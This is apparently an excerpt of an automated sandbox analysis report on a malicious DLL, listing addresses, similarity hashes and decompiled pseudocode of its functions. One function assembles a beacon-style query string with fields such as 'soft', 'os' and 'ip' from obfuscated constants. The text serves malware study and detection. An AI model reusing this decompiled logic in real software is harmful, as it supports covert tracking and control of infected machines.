                                                  0x00402407
                                                  0x0040240e
                                                  0x00000000
                                                  0x00000000
                                                  0x00402410
                                                  0x00402411
                                                  0x00402413
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402413
                                                  0x0040243b
                                                  0x0040243d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040244d
                                                  0x0040244f
                                                  0x00402451
                                                  0x00000000
                                                  0x00000000
                                                  0x00402457
                                                  0x0040245e
                                                  0x0040248a
                                                  0x0040248a
                                                  0x0040248c
                                                  0x0040248e
                                                  0x004024a2
                                                  0x004024a4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402490
                                                  0x00402490
                                                  0x00402490
                                                  0x00402499
                                                  0x0040249a
                                                  0x0040249c
                                                  0x0040249e
                                                  0x0040249e
                                                  0x00000000
                                                  0x00402490
                                                  0x00402460
                                                  0x00402463
                                                  0x00402465
                                                  0x00402477
                                                  0x00402477
                                                  0x0040247a
                                                  0x0040247c
                                                  0x0040247c
                                                  0x0040247d
                                                  0x0040247d
                                                  0x00402483
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402467
                                                  0x00402467
                                                  0x00402467
                                                  0x0040246e
                                                  0x00000000
                                                  0x00000000
                                                  0x00402470
                                                  0x00402470
                                                  0x00402471
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402471
                                                  0x00402473
                                                  0x00402475
                                                  0x00402488
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402488
                                                  0x00000000
                                                  0x00402475
                                                  0x004023e7
                                                  0x004023ea
                                                  0x004023ed
                                                  0x00000000
                                                  0x00000000
                                                  0x004023ef
                                                  0x004023f1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004023f1
                                                  0x004023b6
                                                  0x004023b8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00402426
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MemoryQueryVirtual
                                                  • String ID:
                                                  • API String ID: 2850889275-0
                                                  • Opcode ID: 626958346fd60cabf43f0ddbfab11c40b5535eb766f8715f11b79e1d1ab16b9d
                                                  • Instruction ID: 8a986e9dcfd0441aff0562b3517ea09b8d901034ce7e192845dbb0a1bddafc0a
                                                  • Opcode Fuzzy Hash: 626958346fd60cabf43f0ddbfab11c40b5535eb766f8715f11b79e1d1ab16b9d
                                                  • Instruction Fuzzy Hash: DE61D870600612ABDB19CF29DB9C66A73A5EB95314F24843BDD16F72D1E3BCDC82864C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E40397, Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647167015.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e40000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: t32c
                                                  • API String ID: 0-3674199949
                                                  • Opcode ID: 117cca6488b6fc0c7e92642179208c921f760515844708eca5546562275beb59
                                                  • Instruction ID: 1202544c357470b42bd8f8e04c488136261f4a22cb15c3bfd0d55d6bc225d37f
                                                  • Opcode Fuzzy Hash: 117cca6488b6fc0c7e92642179208c921f760515844708eca5546562275beb59
                                                  • Instruction Fuzzy Hash: E141487290021ADFDF20CF44E984BA9B7B5FB88314F15A5A4DA096B216D334EE85DF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E40469, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647167015.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e40000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: t32c
                                                  • API String ID: 0-3674199949
                                                  • Opcode ID: 00dd7a5faeabe48c389b561aad31ca083426c29c9d9185e8d49efe1a840d490a
                                                  • Instruction ID: 5a0aea57036d48ec70e84ba06489dcf31188a1f1d4cace1f1e860c839fa412a6
                                                  • Opcode Fuzzy Hash: 00dd7a5faeabe48c389b561aad31ca083426c29c9d9185e8d49efe1a840d490a
                                                  • Instruction Fuzzy Hash: F7414A76A00215DFDB20DF94DD80BA9B7B5FF88724F1895A4DA196B246D334EE80CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E403F0, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647167015.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e40000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: t32c
                                                  • API String ID: 0-3674199949
                                                  • Opcode ID: b5d9ae38fa2fbbcf26086a426b665ed40a8c77386611467cddef06e959dbe1d3
                                                  • Instruction ID: ff94a28a48cc7800ac38137fd2c54a39792edba74a99b4882fbc5aec7c939cc4
                                                  • Opcode Fuzzy Hash: b5d9ae38fa2fbbcf26086a426b665ed40a8c77386611467cddef06e959dbe1d3
                                                  • Instruction Fuzzy Hash: 4A317C76900219DFDF20DF44ED80BA9B7B1FB88324F14A5A4DA096B216D334EE81CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00ECB11C, Relevance: .1, Instructions: 77COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 71%
                                                  			E00ECB11C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00ECB287(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00ECB341(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00ECB22C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00ECB287(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00ECB323(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                  0x00ecb120
                                                  0x00ecb121
                                                  0x00ecb122
                                                  0x00ecb125
                                                  0x00ecb127
                                                  0x00ecb12a
                                                  0x00ecb12b
                                                  0x00ecb12d
                                                  0x00ecb12e
                                                  0x00ecb12f
                                                  0x00ecb132
                                                  0x00ecb13c
                                                  0x00ecb1ed
                                                  0x00ecb1f4
                                                  0x00ecb1fd
                                                  0x00ecb142
                                                  0x00ecb142
                                                  0x00ecb148
                                                  0x00ecb14e
                                                  0x00ecb151
                                                  0x00ecb154
                                                  0x00ecb158
                                                  0x00ecb15d
                                                  0x00ecb162
                                                  0x00ecb1e2
                                                  0x00000000
                                                  0x00ecb164
                                                  0x00ecb164
                                                  0x00ecb170
                                                  0x00ecb172
                                                  0x00ecb1cd
                                                  0x00ecb1cd
                                                  0x00ecb1d3
                                                  0x00000000
                                                  0x00ecb174
                                                  0x00ecb183
                                                  0x00ecb185
                                                  0x00ecb186
                                                  0x00ecb187
                                                  0x00ecb18a
                                                  0x00ecb18a
                                                  0x00ecb18c
                                                  0x00000000
                                                  0x00ecb18e
                                                  0x00ecb18e
                                                  0x00ecb1d8
                                                  0x00ecb190
                                                  0x00ecb190
                                                  0x00ecb194
                                                  0x00ecb19c
                                                  0x00ecb1a1
                                                  0x00ecb1a6
                                                  0x00ecb1b2
                                                  0x00ecb1ba
                                                  0x00ecb1c1
                                                  0x00ecb1c7
                                                  0x00ecb1cb
                                                  0x00000000
                                                  0x00ecb1cb
                                                  0x00ecb18e
                                                  0x00ecb18c
                                                  0x00000000
                                                  0x00ecb172
                                                  0x00ecb1e6
                                                  0x00ecb1e6
                                                  0x00ecb1e6
                                                  0x00ecb162
                                                  0x00ecb202
                                                  0x00ecb209

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                  • Instruction ID: 8727ac3b4ad56e3268332d23308f7ca64fa1d2b154fd533cd9db482e66a918b5
                                                  • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                  • Instruction Fuzzy Hash: 3A21E2329012149BCB14DF68C892EABBBA5FF44350F49806CE855EB245D731FA16CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402154, Relevance: .1, Instructions: 77COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 71%
                                                  			E00402154(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E004022BB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00402375(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00402260(_t55, _t66);
										_t89 = _t66 + 0x10;
										E004022BB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00402357(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                  0x00402158
                                                  0x00402159
                                                  0x0040215a
                                                  0x0040215d
                                                  0x0040215f
                                                  0x00402162
                                                  0x00402163
                                                  0x00402165
                                                  0x00402166
                                                  0x00402167
                                                  0x0040216a
                                                  0x00402174
                                                  0x00402225
                                                  0x0040222c
                                                  0x00402235
                                                  0x0040217a
                                                  0x0040217a
                                                  0x00402180
                                                  0x00402186
                                                  0x00402189
                                                  0x0040218c
                                                  0x00402190
                                                  0x00402195
                                                  0x0040219a
                                                  0x0040221a
                                                  0x00000000
                                                  0x0040219c
                                                  0x0040219c
                                                  0x004021a8
                                                  0x004021aa
                                                  0x00402205
                                                  0x00402205
                                                  0x0040220b
                                                  0x00000000
                                                  0x004021ac
                                                  0x004021bb
                                                  0x004021bd
                                                  0x004021be
                                                  0x004021bf
                                                  0x004021c2
                                                  0x004021c2
                                                  0x004021c4
                                                  0x00000000
                                                  0x004021c6
                                                  0x004021c6
                                                  0x00402210
                                                  0x004021c8
                                                  0x004021c8
                                                  0x004021cc
                                                  0x004021d4
                                                  0x004021d9
                                                  0x004021de
                                                  0x004021ea
                                                  0x004021f2
                                                  0x004021f9
                                                  0x004021ff
                                                  0x00402203
                                                  0x00000000
                                                  0x00402203
                                                  0x004021c6
                                                  0x004021c4
                                                  0x00000000
                                                  0x004021aa
                                                  0x0040221e
                                                  0x0040221e
                                                  0x0040221e
                                                  0x0040219a
                                                  0x0040223a
                                                  0x00402241

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                  • Instruction ID: 991b6e347445fc6bdfd9f5c6b66579e94d9d23a965324a07e0cc5b9e4db4a249
                                                  • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                  • Instruction Fuzzy Hash: 1421C7329002049BCB14DFA9C9C8967B7A5BF49310B4680ADDD19AB2C5D774FA15CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E40066, Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647167015.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e40000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a927edfd22bb6a87c59e064a0d897be9f8ff1fc4e048460ef94ea895cfa2374a
                                                  • Instruction ID: 059581c573e862f4b8ee63126a68fb17cb25446cf25fa26084240c671de4b550
                                                  • Opcode Fuzzy Hash: a927edfd22bb6a87c59e064a0d897be9f8ff1fc4e048460ef94ea895cfa2374a
                                                  • Instruction Fuzzy Hash: E2E0B6B1901119AEEF15CA54CC48FAAB7BDEBC8700F1081D5E60CAA150D2309E808F60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E40285, Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647167015.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e40000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 64181d5a1a0adb3b83a868520eb234369a1b34ebae05e35cc0e8b6d16c9ba115
                                                  • Instruction ID: 3181798b8552b92ef0a32780970849921aa2b8a1ace5e7549d6e07fef26dc94e
                                                  • Opcode Fuzzy Hash: 64181d5a1a0adb3b83a868520eb234369a1b34ebae05e35cc0e8b6d16c9ba115
                                                  • Instruction Fuzzy Hash: 95D09235E0016A9BCF20EA60CA5879EF3B6EB9D314F1500D8C60C3735087342E86CE40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00ECA279, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 66%
                                                  			E00ECA279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0xecd018; // 0xf56cfa1f
				asm("bswap eax");
				_t27 =  *0xecd014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0xecd010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0xecd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t30 =  *0xecd27c; // 0x213a5a8
				_t3 = _t30 + 0xece633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0xecd02c,  *0xecd004, _t25);
				_t33 = E00EC1C1A();
				_t34 =  *0xecd27c; // 0x213a5a8
				_t4 = _t34 + 0xece673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E00EC54BC(_t91);
				if(_t96 != 0) {
					_t83 =  *0xecd27c; // 0x213a5a8
					_t6 = _t83 + 0xece8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0xecd238, 0, _t96);
				}
				_t97 = E00EC7649();
				if(_t97 != 0) {
					_t78 =  *0xecd27c; // 0x213a5a8
					_t8 = _t78 + 0xece8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0xecd238, 0, _t97);
				}
				_t98 =  *0xecd32c; // 0x30095b0
				_a32 = E00EC9395(0xecd00a, _t98 + 4);
				_t42 =  *0xecd2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0xecd27c; // 0x213a5a8
					_t11 = _t74 + 0xece8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0xecd2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0xecd27c; // 0x213a5a8
					_t13 = _t71 + 0xece8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0xecd238, 0, 0x800);
					if(_t100 != 0) {
						E00EC7A80(GetTickCount());
						_t50 =  *0xecd32c; // 0x30095b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0xecd32c; // 0x30095b0
						__imp__(_t54 + 0x40);
						_t56 =  *0xecd32c; // 0x30095b0
						_t103 = E00EC8307(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0xecc2ac);
							_push(_t103);
							_t62 = E00EC3CC8();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E00EC1199(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E00ECA1B0();
								}
								HeapFree( *0xecd238, 0, _v44);
							}
							HeapFree( *0xecd238, 0, _t103);
						}
						HeapFree( *0xecd238, 0, _t100);
					}
					HeapFree( *0xecd238, 0, _a24);
				}
				HeapFree( *0xecd238, 0, _t105);
				return _a12;
			}
















































                                                  0x00eca279
                                                  0x00eca279
                                                  0x00eca279
                                                  0x00eca280
                                                  0x00eca286
                                                  0x00eca28e
                                                  0x00eca290
                                                  0x00eca290
                                                  0x00eca29d
                                                  0x00eca2a8
                                                  0x00eca2ab
                                                  0x00eca2b6
                                                  0x00eca2b9
                                                  0x00eca2be
                                                  0x00eca2c1
                                                  0x00eca2c6
                                                  0x00eca2c9
                                                  0x00eca2d5
                                                  0x00eca2e2
                                                  0x00eca2e4
                                                  0x00eca2ea
                                                  0x00eca2ef
                                                  0x00eca2fa
                                                  0x00eca2fc
                                                  0x00eca2ff
                                                  0x00eca306
                                                  0x00eca30a
                                                  0x00eca30c
                                                  0x00eca311
                                                  0x00eca31d
                                                  0x00eca31f
                                                  0x00eca32b
                                                  0x00eca32d
                                                  0x00eca32d
                                                  0x00eca338
                                                  0x00eca33c
                                                  0x00eca33e
                                                  0x00eca343
                                                  0x00eca34f
                                                  0x00eca351
                                                  0x00eca35d
                                                  0x00eca35f
                                                  0x00eca35f
                                                  0x00eca365
                                                  0x00eca378
                                                  0x00eca37c
                                                  0x00eca383
                                                  0x00eca386
                                                  0x00eca38b
                                                  0x00eca396
                                                  0x00eca398
                                                  0x00eca39b
                                                  0x00eca39b
                                                  0x00eca39d
                                                  0x00eca3a4
                                                  0x00eca3a7
                                                  0x00eca3ac
                                                  0x00eca3b6
                                                  0x00eca3b8
                                                  0x00eca3c0
                                                  0x00eca3d9
                                                  0x00eca3dd
                                                  0x00eca3e9
                                                  0x00eca3ee
                                                  0x00eca3f7
                                                  0x00eca408
                                                  0x00eca40c
                                                  0x00eca415
                                                  0x00eca41b
                                                  0x00eca428
                                                  0x00eca435
                                                  0x00eca43b
                                                  0x00eca447
                                                  0x00eca44d
                                                  0x00eca44e
                                                  0x00eca455
                                                  0x00eca459
                                                  0x00eca45f
                                                  0x00eca466
                                                  0x00eca46d
                                                  0x00eca473
                                                  0x00eca47a
                                                  0x00eca47e
                                                  0x00eca489
                                                  0x00eca490
                                                  0x00eca494
                                                  0x00eca49d
                                                  0x00eca49d
                                                  0x00eca4ae
                                                  0x00eca4ae
                                                  0x00eca4bd
                                                  0x00eca4bd
                                                  0x00eca4cc
                                                  0x00eca4cc
                                                  0x00eca4de
                                                  0x00eca4de
                                                  0x00eca4ed
                                                  0x00eca4fe

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00ECA290
                                                  • wsprintfA.USER32 ref: 00ECA2DD
                                                  • wsprintfA.USER32 ref: 00ECA2FA
                                                  • wsprintfA.USER32 ref: 00ECA31D
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00ECA32D
                                                  • wsprintfA.USER32 ref: 00ECA34F
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00ECA35F
                                                  • wsprintfA.USER32 ref: 00ECA396
                                                  • wsprintfA.USER32 ref: 00ECA3B6
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00ECA3D3
                                                  • GetTickCount.KERNEL32 ref: 00ECA3E3
                                                  • RtlEnterCriticalSection.NTDLL(03009570), ref: 00ECA3F7
                                                  • RtlLeaveCriticalSection.NTDLL(03009570), ref: 00ECA415
                                                    • Part of subcall function 00EC8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00ECA428,?,030095B0), ref: 00EC8332
                                                    • Part of subcall function 00EC8307: lstrlen.KERNEL32(?,?,?,00ECA428,?,030095B0), ref: 00EC833A
                                                    • Part of subcall function 00EC8307: strcpy.NTDLL ref: 00EC8351
                                                    • Part of subcall function 00EC8307: lstrcat.KERNEL32(00000000,?), ref: 00EC835C
                                                    • Part of subcall function 00EC8307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00ECA428,?,030095B0), ref: 00EC8379
                                                  • StrTrimA.SHLWAPI(00000000,00ECC2AC,?,030095B0), ref: 00ECA447
                                                    • Part of subcall function 00EC3CC8: lstrlen.KERNEL32(030087FA,00000000,00000000,74ECC740,00ECA453,00000000), ref: 00EC3CD8
                                                    • Part of subcall function 00EC3CC8: lstrlen.KERNEL32(?), ref: 00EC3CE0
                                                    • Part of subcall function 00EC3CC8: lstrcpy.KERNEL32(00000000,030087FA), ref: 00EC3CF4
                                                    • Part of subcall function 00EC3CC8: lstrcat.KERNEL32(00000000,?), ref: 00EC3CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 00ECA466
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00ECA46D
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00ECA47A
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00ECA47E
                                                    • Part of subcall function 00EC1199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 00EC124B
                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00ECA4AE
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00ECA4BD
                                                  • HeapFree.KERNEL32(00000000,00000000,?,030095B0), ref: 00ECA4CC
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00ECA4DE
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00ECA4ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                  • String ID: _h
                                                  • API String ID: 3080378247-4139817520
                                                  • Opcode ID: ff8db47ac72771a3b6529f921b05a42f13a4a78868396d1e10ee975d34d9199b
                                                  • Instruction ID: 73fb0122b79fd6387bbce1426b46c470feb3f482a212a20ff1181b7f8fd9884d
                                                  • Opcode Fuzzy Hash: ff8db47ac72771a3b6529f921b05a42f13a4a78868396d1e10ee975d34d9199b
                                                  • Instruction Fuzzy Hash: B961BC71504204AFC7119B6AEC4AF5A77E9EB48314F190038F918F7271DB37E80B9B66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC816C, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 27%
